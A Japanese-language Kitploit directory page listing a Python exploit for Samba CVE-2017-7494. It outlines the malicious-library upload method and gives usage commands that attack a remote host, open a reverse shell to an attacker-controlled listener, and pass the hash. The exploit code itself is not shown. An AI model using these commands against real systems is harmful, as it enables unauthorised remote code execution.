Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — CVE-2017-7494 python エクスプロイト | Kitploit
ツール/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
ペイロード生成脆弱性分析エクスプロイトシェルコードペネトレーションテストリモートアクセスツール
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

CVE-2017-7494 python エクスプロイト

リポジトリを見る
614年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

noSAMBAnoCRY CVE-2017-7494

SAMBA CVE-2017-7494 脆弱性(別名 is_know_pipename!)のリモートエクスプロイト

詳細

このエクスプロイトは3つの部分に分かれています:

  • 悪意のあるライブラリ(evilLib)を以下のアーキテクチャ向けにコンパイル: x86_64, x86, または i686
  • 書き込み可能な共有を見つけ、そこに evilLib をアップロード
  • evilLib をロード、すべてが正しく動作すれば RCE!

ターゲットが脆弱であり、ペイロードがターゲットのオペレーティングシステムおよびアーキテクチャに適切である限り、このエクスプロイトは非常に信頼性が高いです。

使い方

ターゲットに対してエクスプロイトを実行し、シェルが起動するのを待ちます:

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST
root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

samba バージョン 3.5.0 > 3.6.0 の場合は、引数 -o 1 を追加するだけです。

root@kitploit:~
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

独自のカスタム .so を実行する

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

カスタム samba ポートを使用するには、引数 -p を使用します。

root@kitploit:~
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

smbpasswd のハッシュに遭遇してクラックできない場合は、引数 --hashes=LM:NT を使用してパス・ザ・ハッシュ(pass-the-hash)が可能です。

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

免責事項

このリポジトリは以下のリポジトリから着想を得ています: joxeankoret/exploit-CVE-2017-7494 および Archivaldo

ツールをダウンロード